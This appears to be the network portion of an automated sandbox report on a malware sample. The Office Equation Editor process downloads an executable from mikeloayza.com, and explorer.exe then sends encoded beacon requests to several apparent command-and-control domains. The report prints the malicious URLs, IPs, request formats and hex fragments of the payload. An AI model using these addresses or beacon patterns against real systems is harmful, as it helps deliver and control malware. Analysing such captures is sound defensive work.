Jan 14, 2022 16:04:33.695847034 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:04:33.875735044 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 16:05:43.551692963 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:05:43.590673923 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 16:05:53.711869001 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:05:53.744340897 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 16:05:59.160648108 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:05:59.182547092 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 16:06:04.200428963 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:06:04.228068113 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 16:06:09.376717091 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 16:06:09.671801090 CET | 53 | 55616 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 16:04:33.695847034 CET | 192.168.2.22 | 8.8.8.8 | 0x5e41 | Standard query (0) | mikeloayza.com | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:43.551692963 CET | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.fisioletsgo.com | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:53.711869001 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.bitcointradel.com | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:59.160648108 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.freeadakahamazon.com | A (IP address) | IN (0x0001)
Jan 14, 2022 16:06:04.200428963 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.executive-air.net | A (IP address) | IN (0x0001)
Jan 14, 2022 16:06:09.376717091 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.luckyfandom.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 16:04:33.875735044 CET | 8.8.8.8 | 192.168.2.22 | 0x5e41 | No error (0) | mikeloayza.com | | 131.153.37.4 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.32.21 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:53.744340897 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.bitcointradel.com | bitcointradel.com | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 16:05:53.744340897 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | bitcointradel.com | | 162.0.209.73 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:05:59.182547092 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | Name error (3) | www.freeadakahamazon.com | none | none | A (IP address) | IN (0x0001)
Jan 14, 2022 16:06:04.228068113 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.executive-air.net | executive-air.net | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 16:06:04.228068113 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | executive-air.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 14, 2022 16:06:09.671801090 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.luckyfandom.com | | 118.67.131.217 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• mikeloayza.com
• www.fisioletsgo.com
• www.bitcointradel.com
• www.executive-air.net
• www.luckyfandom.com

HTTP Packets

Session ID: 0
Source IP: 192.168.2.22
Source Port: 49168
Destination IP: 131.153.37.4
Destination Port: 443
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data

Session ID: 1
Source IP: 192.168.2.22
Source Port: 49167
Destination IP: 131.153.37.4
Destination Port: 80
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 16:04:34.101399899 CET | 0 | OUT | GET /E9/i4L.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: mikeloayza.com
Connection: Keep-Alive
Jan 14, 2022 16:04:34.291004896 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 14 Jan 2022 15:04:33 GMT
Server: Apache
Location: https://mikeloayza.com/E9/i4L.exe
Content-Length: 241
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p></body></html>


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 216.239.34.21
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 16:05:43.622512102 CET | 612 | OUT | GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
Host: www.fisioletsgo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 14, 2022 16:05:43.705197096 CET | 614 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
x-ua-compatible: IE=edge
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 14 Jan 2022 15:05:43 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'report-sample' 'nonce-vAqIb00c7GC8dZd6P1blJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: unsafe-none
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Set-Cookie: NID=511=t0rMwAPz15wcHq-ZRZW5NoRI-ZH07DBtt8c_PgorYqrriUVH4ipIrYKjh0ffHc_zo5WfwvEaQSObKe8qX6yuxP2EUIlFy0oNXZuNi94Oh3zy6wjFiGXNxN4f9T2NkgZyLMdkQ6GUZ6HRYUptkpWx82kms0-bAKO6cwgX8XjSpwQ; expires=Sat, 16-Jul-2022 15:05:43 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Connection: close
Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="vAqIb00c7GC8dZd6P1blJA">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business","


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49171
Destination IP: 162.0.209.73
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 16:05:53.933439016 CET | 632 | OUT | GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
Host: www.bitcointradel.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 14, 2022 16:05:54.111656904 CET | 634 | IN | HTTP/1.1 301 Moved Permanently
keep-alive: timeout=5, max=100
content-type: text/html
content-length: 707
date: Fri, 14 Jan 2022 15:05:54 GMT
server: LiteSpeed
location: https://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p
x-turbo-charged-by: LiteSpeed
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload;
referrer-policy: no-referrer-when-downgrade
connection: close
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49172
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 16:06:04.249555111 CET | 635 | OUT | GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
Host: www.executive-air.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 14, 2022 16:06:04.365375996 CET | 635 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 14 Jan 2022 15:06:04 GMT
Content-Type: text/html
Content-Length: 275
ETag: "618be761-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 5
Source IP: 192.168.2.22
Source Port: 49173
Destination IP: 118.67.131.217
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 16:06:19.047626972 CET | 636 | OUT | GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
Host: www.luckyfandom.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 14, 2022 16:06:19.428003073 CET | 637 | IN | HTTP/1.1 302 Found
Date: Fri, 14 Jan 2022 15:06:19 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Location: /
Content-Length: 0
Content-Type: text/html; charset=euc-kr
Age: 0
Connection: close


HTTPS Proxied Packets

Session ID: 0
Source IP: 192.168.2.22
Source Port: 49168
Destination IP: 131.153.37.4
Destination Port: 443
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
2022-01-14 15:04:35 UTC | 0 | OUT | GET /E9/i4L.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: mikeloayza.com
2022-01-14 15:04:35 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 15:04:34 GMT
Server: Apache
ETag: "92e00-5d5883126df7c"
Accept-Ranges: bytes
Content-Length: 601600
Cache-Control: max-age=31536000
Expires: Sat, 14 Jan 2023 15:04:34 GMT
Vary: Accept-Encoding
Referrer-Policy: no-referrer-when-downgrade
Connection: close
Content-Type: application/x-msdownload
2022-01-14 15:04:35 UTC | 0 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELGa> @ @
                                              Data Ascii: 111111111111111111111111111/0
                                              2022-01-14 15:04:36 UTC160INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 96 9a 32 4c 97 99 31 ce 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f f5 96 99 31 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 2L111111111111/1X
                                              2022-01-14 15:04:36 UTC176INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 98 2f db 97 99 31 ff 97 99 31 ff 96 97 30 cd 97 99 2f e7 97 99 31 ff 97 99 31 ff 95 99 31 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99
                                              Data Ascii: 11111111//110/11111111111111111111111111111
                                              2022-01-14 15:04:36 UTC192INData Raw: bf fd 0e 85 bc f5 75 f2 7e e0 e4 e1 b9 e5 a3 ad 3b b9 c1 77 27 bf c7 56 9e 3e 76 1e 9a 6d 03 a1 89 6f f9 27 1b 21 23 71 f5 da 49 cb e6 ee 5e 8d 72 7e df de 9a bc d8 07 59 f3 11 fb 0e 3f 5b 5a 3f 7a f2 77 78 96 fe 29 6f cf 80 35 4a 7e 6b ff 99 4f 3b d9 88 32 6d 92 8b 77 22 d0 90 7f da 3b d8 31 ec 76 c0 9f 3c e9 dd db 71 d6 db e9 a5 b7 7b dd 5b de f3 e9 09 b6 fd fd 1e 2a 59 d3 87 a4 23 eb 8c 1b 7b 4f 4c f6 ef 5d d0 b8 99 83 c9 86 ac bc 27 9c fd 85 1e f7 7e 87 31 75 bd 4f e2 77 ef 37 b8 43 8a 26 1e ee f6 1b 94 75 1a 1e 5d 6d da fb fd 53 7d 68 3a f1 db ee fe f5 bc 9a 78 c0 3e b5 71 44 b7 e9 dc bd 23 ed fd d6 7d 47 3a fc d0 f1 7d 5f 93 de 9e f6 2c 9c 0b f4 1c 46 8e 78 e8 73 70 f4 f8 50 74 02 f8 8b 6f 85 a3 5e ee 15 d0 57 69 71 85 72 69 f1 40 d3 5b 7f a7 ae 36
                                              Data Ascii: u~;w'V>vmo'!#qI^r~Y?[Z?zwx)o5J~kO;2mw";1v<q{[*Y#{OL]'~1uOw7C&u]mS}h:x>qD#}G:}_,FxspPto^Wiqri@[6
                                              2022-01-14 15:04:36 UTC208INData Raw: c6 0f 7f 7d 5f 23 31 1b 48 9f 9d 3b e6 9d 03 90 75 8d 71 8b 8f 05 59 df c0 b3 f7 9d 7c 6d e7 f7 47 80 5f ee 34 de 3b fd 0a d2 ae f5 e3 96 81 8f d2 f3 ae 95 e7 dd 79 d7 17 e5 ef 74 67 0b 64 9c df 0b e1 ef 74 17 01 18 63 cf 8c 6b ea d3 67 cf f8 9d a4 f3 be 50 c6 7b 21 f5 f8 85 fc 6e 08 bd bb f2 bc d7 95 f2 d5 93 94 3b 63 38 e1 67 fd 7d 47 3f 7c df d1 4f f9 1d fd f8 d9 3b fa e6 ed 67 e5 b9 c3 7e 57 9e 73 cc bb f2 bc 07 71 57 9e f3 c5 bb f2 9c eb a5 7c fb 9f f2 bb fe 47 2f ef e8 67 5f e2 ae 3c 77 38 ee ca e5 3f 2b cf d9 52 ca 97 ff 94 df f1 9f 78 f1 8e 7e ce 68 ee ca 33 5f de b5 9f f2 bb f6 73 86 70 47 3f be f6 ae 3c df 15 b8 6b 3f e5 77 ed 3b 8f f4 bc a3 9f f7 27 ee ca 73 ce 78 57 9e ff 79 70 c7 5f ca ef f8 cb 3a f4 8e 7e de d3 48 79 ce 98 73 07 3b 67 88 49
                                              Data Ascii: }_#1H;uqY|mG_4;ytgdtckgP{!n;c8g}G?|O;g~WsqW|G/g_<w8?+Rx~h3_spG?<k?w;'sxWyp_:~Hys;gI
                                              2022-01-14 15:04:36 UTC224INData Raw: d7 f0 0f af 11 fc 37 66 a5 cc f7 af 66 74 a3 d6 e6 5c 79 46 76 5c 3e 6f 37 01 54 ba e1 52 d3 6f 66 fe 31 0f d7 a1 67 61 5d e3 7c cd 1e a5 10 f5 0e c9 c3 15 21 7e 64 38 cf e3 63 0f dc 83 63 25 72 ac b7 46 55 6f 53 41 fc b6 e2 49 e9 74 68 9c e6 c9 f7 b6 f9 f6 cc 6a 23 6d a9 d6 be a2 20 66 2b 29 a6 2c cc 56 d2 f6 6c 99 6e dc 37 97 81 cc cb 5e 86 51 03 20 cb ed e1 32 99 ec 18 e2 3d 7e d8 dc 95 14 64 f9 51 d7 54 b0 f5 0f 62 d6 10 ad 4b 4b 46 6a 87 2b f7 44 dc e7 ee 15 a6 b3 fe 28 ae ca 2a 1a b4 c8 b5 09 34 20 43 7a 41 ea e4 18 74 29 a1 d3 55 f0 8d 7a 1b 77 45 9c 91 11 2e 13 04 5e df 98 0d 1a c8 93 e6 4f 81 31 c3 99 0a 06 10 79 70 5e b4 e8 c7 71 6d 37 10 b4 60 e6 1b cb ad b6 1a 85 15 97 a9 6c 7b 01 20 8e 25 37 a9 8d b9 47 22 ec bc c9 0b 5e e0 a6 aa 65 61 37 45
                                              Data Ascii: 7fft\yFv\>o7TRof1ga]|!~d8cc%rFUoSAIthj#m f+),Vln7^Q 2=~dQTbKKFj+D(*4 CzAt)UzwE.^O1yp^qm7`l{ %7G"^ea7E
                                              2022-01-14 15:04:36 UTC240INData Raw: 8c 45 dc 71 6b c1 e7 ec 55 94 31 53 96 d3 84 32 e9 2d cb e4 6f f8 c6 cc 46 9f 70 e1 ec 06 6c 38 2a 99 bb ba 86 64 87 16 e9 e4 3e b5 03 11 0a a3 be 9e bf eb 18 f1 4a a6 1d 17 22 ed d6 a5 1d 81 73 d7 65 b0 d3 0f c9 20 45 92 5b e6 80 fe 91 02 3e 19 61 90 75 6e 34 09 8b c2 5b 59 56 13 b6 e5 e8 69 53 d6 8d a9 ea fd b1 bc fd 60 cb 06 79 8b 42 ce 7d eb 88 89 c6 26 44 96 55 18 6d 19 ed e6 5a 0f de 2a 1b ae a5 b8 c8 4a 01 0d 0f a4 18 1c 74 d4 63 fa 46 d3 f6 55 74 37 b2 3d 82 26 4b 4c bd bd 00 45 e2 59 e5 d4 ba d1 ae 44 e1 de f6 1c 72 8c ec ad 6e 34 41 28 62 62 27 3a 32 dd da db ac 3a 37 91 c9 d9 2f 33 2d 55 f3 78 7a 8a 70 ea ac d6 01 a6 71 06 fa aa 49 06 65 15 94 b7 47 55 a7 c1 8f a5 cd c3 81 69 01 cf 25 11 d9 ec 84 00 82 85 52 d7 6c 0e db 63 b1 99 ba 67 5d cf e7
                                              Data Ascii: EqkU1S2-oFpl8*d>J"se E[>aun4[YViS`yB}&DUmZ*JtcFUt7=&KLEYDrn4A(bb':2:7/3-UxzpqIeGUi%Rlcg]
                                              2022-01-14 15:04:36 UTC256INData Raw: b2 68 05 98 09 bb cd 98 5b dd cd 79 18 a9 3e 48 0f 26 4e 8c 13 4b 8d c0 b2 b3 c9 0a 9f 95 54 d5 83 75 ab 2b da 0e a6 67 b3 a3 82 6b 65 27 e9 ed 61 c2 9c 00 0d c6 09 3d 26 34 34 63 d6 ac ac 65 a9 98 22 ec 29 3b 7f a0 95 ae 0e 46 8e b2 67 2c 35 a8 03 a7 da 44 d9 9c 57 12 fc 65 a2 c6 1e 8b 09 16 72 30 12 9a dd 25 20 c1 1d 38 6b cc 08 3b 13 24 41 14 25 ff ff 9c 79 db f8 b2 61 9d c0 3b b1 59 19 b7 cf e3 e6 de 48 a4 05 06 40 d3 db 83 33 b7 06 88 7c 15 a3 cb 34 7b 03 4d 3d 1f a6 25 c5 28 6f 00 c3 9d 91 31 d9 59 ca 3a 82 38 56 38 0a 19 82 7c 9f a9 ad ea 43 04 17 92 f6 c4 33 7d b0 df 0e 76 1d 45 23 6a 6d 78 b4 47 86 f3 ba 29 c3 ed 38 83 40 1a ba 8b 18 bb 11 c5 56 b2 4b 18 14 45 5b d9 dc d4 87 6e 1b f1 da c5 54 42 74 37 8e 91 00 d4 cf fa f5 f3 22 27 1d de 38 74 40
                                              Data Ascii: h[y>H&NKTu+gke'a=&44ce");Fg,5DWer0% 8k;$A%ya;YH@3|4{M=%(o1Y:8V8|C3}vE#jmxG)8@VKE[nTBt7"'8t@
                                              2022-01-14 15:04:36 UTC272INData Raw: 54 5d 6c 13 d3 77 7d d7 eb 8b d1 59 ce 3c f7 8e 5c d0 01 0c 4f 42 5d 59 ce 38 39 9a e7 02 8c 39 1b 47 b4 de a2 6a aa 87 bc 20 d4 e1 e7 f5 90 74 7c 5d 6e b7 d0 16 12 8e 65 59 3d f2 ab 28 c5 81 e9 6b 4b d0 a9 53 4c cf cb fc a4 3b 66 bf 63 54 2d 7d 8d 39 91 70 23 71 ca b3 fa e0 53 1a 99 e8 dd bb cf 76 c3 ef 32 d5 7e cf d1 7d 5b fe 9d bf 89 02 cd 1f ac fe f7 ff f2 16 ec 27 bf f7 c3 99 da 8f 5c 46 d6 e7 ff 6e b0 53 12 50 95 01 88 0a e7 a3 60 fb df 73 56 24 b3 02 2a 4f ef 23 0b 7b 19 86 1f 6f 01 01 e5 0d 1d 6d df 73 73 42 bc 6a 7f f5 8e b5 0f 78 be fa 47 af 7c 0e a3 98 90 ad 15 6b 3e 29 e3 48 70 cb bf 7c b5 8f 62 59 26 ea 6a 20 79 b0 bf b8 b7 53 cb 6b 04 69 35 f9 1a 0a a0 ee df ff 8b 8f fe 75 5f 37 23 96 5c ee e5 25 95 a5 ba a7 6a 8d 97 c0 a9 ac a3 7d c8 f9 fb
                                              Data Ascii: T]lw}Y<\OB]Y899Gj t|]neY=(kKSL;fcT-}9p#qSv2~}['\FnSP`sV$*O#{omssBjxG|k>)Hp|bY&j ySki5u_7#\%j}
                                              2022-01-14 15:04:36 UTC288INData Raw: f3 11 ce 3b 7e ff df ff fb 6b 5f f5 3f df f4 d4 db fe e4 5f 7f 6f d3 dc ec 33 ec a8 9a d5 14 11 89 80 35 95 e6 b2 5f eb ff 09 56 7b 50 c2 1f 27 1f 44 1f 8d d4 a2 00 88 fb 72 f2 be 9c 00 4e 29 86 c4 dd 52 a0 43 f5 06 ee eb 49 24 2b da ef 06 f6 48 16 45 a5 2a 7c dd bd df 11 a4 6c 0f 94 dd 80 fa 4a dd 07 f0 5f 20 a5 97 e8 a9 d3 94 fc 9a 93 e1 8e 81 d2 1b a8 8b a1 6a 50 4f 51 ef 29 27 65 9e fb 31 e0 ee 53 ff e7 fe 21 29 0b 4b 40 89 36 7c e9 8b 3e 49 75 5e 53 3b 92 a4 b4 bb 26 81 c7 b5 07 ae 37 fc b2 bf 4e c5 1a 73 28 a3 18 0e 40 94 99 14 78 7c ef a7 fa 30 50 7a 39 79 ec 3f 1c 94 48 10 63 bd 82 a3 a6 1a 9b 85 6f f7 b7 a9 3c f6 fb 0f e8 1e 72 27 d2 35 80 73 a8 76 1b f3 3e 29 b4 c4 25 82 b5 97 cd 3f f3 4d eb c2 2b f7 ec 2a d3 fe 4e f2 7a 1f c9 40 aa 6e f5 9e e2
                                              Data Ascii: ;~k_?_o35_V{P'DrN)RCI$+HE*|lJ_ jPOQ)'e1S!)K@6|>Iu^S;&7Ns(@x|0Pz9y?Hco<r'5sv>)%?M+*Nz@n
                                              2022-01-14 15:04:36 UTC304INData Raw: 11 91 a6 8c 3a 56 81 18 78 fa 86 10 de 0b 67 5b 5b 23 2e e9 0b 8b aa 8e 72 cc db f0 8b b6 ec 29 d5 1b 48 c9 40 46 59 dc 54 e0 f2 39 55 68 a7 8a ee 89 db ba f3 85 35 ab 2a 7f e8 ec 8a 6e 18 33 41 f8 c1 da b1 0c 95 b8 71 d6 ca d4 14 06 f9 29 57 0e ce 22 db 41 fa 6a 65 cd e7 48 09 64 1d 9b 6c 72 9f 79 03 dd 40 0d 59 9f be d0 94 a6 6d 1b 26 99 5f 37 05 61 7d d9 9d b1 c4 05 fe 54 d0 ab 35 1b 9a 06 69 c4 19 e0 67 9b a0 a7 84 45 ac 5b b1 29 b5 38 29 3d c0 b8 13 59 d3 62 92 9a e4 03 69 42 52 c6 aa 80 96 d6 25 e9 7b 40 59 00 5a 4d d4 34 6f 4f 15 a0 a7 48 ef e9 61 38 2c ad e5 06 66 53 30 05 75 d9 75 18 94 d8 00 84 9e 19 e4 91 02 9f b0 ae 50 bd 9c 90 6e 58 e5 23 43 ce 46 8f 08 7d 50 e0 01 c9 1b e1 1b 76 cf 0b 82 7d 38 01 77 9d 7d b8 28 1a 1c 8d 23 2d e1 84 1b 11 26
                                              Data Ascii: :Vxg[[#.r)H@FYT9Uh5*n3Aq)W"AjeHdlry@Ym&_7a}T5igE[)8)=YbiBR%{@YZM4oOHa8,fS0uuPnX#CF}Pv}8w}(#-&
                                              2022-01-14 15:04:36 UTC320INData Raw: 0d 45 20 20 88 20 78 44 2f 8c cb 26 2c 33 b8 00 a6 91 01 3b 6a d1 81 6d a4 86 06 42 3d 73 52 5c b8 9b 99 f1 5e 53 91 e2 6f 64 53 65 4d 83 dd 16 2d 7d 39 86 9a 3b 7a a0 39 dd 44 63 60 35 be 40 b1 e8 8d 13 31 25 6e 91 a3 b6 6d 7d ef c6 d4 12 17 9d 53 7a 80 be f2 b4 8c 69 59 dd 57 bb c4 1d 26 6e c9 57 55 07 ef fc 48 e5 62 9e 2c 62 bd 88 c1 86 58 ba f6 2e 13 b2 05 39 90 74 07 ed b0 96 26 e5 d6 1d 94 4d 06 0b 25 b1 ca e6 31 07 6e 1b a3 24 9b 13 b5 cf ba 97 39 46 59 14 6c 6d 49 96 51 f1 44 a7 15 5f c6 d1 40 52 b6 b4 73 d8 19 c2 f3 e3 48 e2 86 59 77 6d b8 84 52 6f 4f b0 4a ca 14 02 5b ab 91 22 73 ea b9 16 18 b1 32 6b 4a bf f6 40 3e 42 b8 38 1f 1c 97 c2 46 70 e5 9b 99 fd 56 d4 37 c7 82 dc a8 b5 da 1e dd 33 a9 21 59 d4 15 67 c4 0f 33 8c 95 26 a6 c9 72 7b f7 36 cd
                                              Data Ascii: E xD/&,3;jmB=sR\^SodSeM-}9;z9Dc`5@1%nm}SziYW&nWUHb,bX.9t&M%1n$9FYlmIQD_@RsHYwmRoOJ["s2kJ@>B8FpV73!Yg3&r{6
